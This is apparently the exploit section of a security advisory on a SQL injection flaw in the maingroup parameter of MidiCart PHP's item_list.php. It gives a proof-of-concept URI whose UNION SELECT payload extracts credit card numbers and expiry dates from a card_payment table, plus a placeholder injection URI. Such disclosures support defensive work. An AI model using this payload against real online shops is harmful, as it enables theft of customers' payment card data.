• info
• discussion
• exploit
• solution
• references

MidiCart PHP Item_List.PHP MainGroup Parameter SQL Injection Vulnerability

No exploit is required.

The following proof-of-concept URIs are available:

http://www.example.com/shop/item_list.php?maingroup=-99 'UNION SELECT null, null, CreditCard, ExpDate,null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null FROM card_payment

http://www.example.com/path/item_list.asp?maingroup=[SQL INJECTION]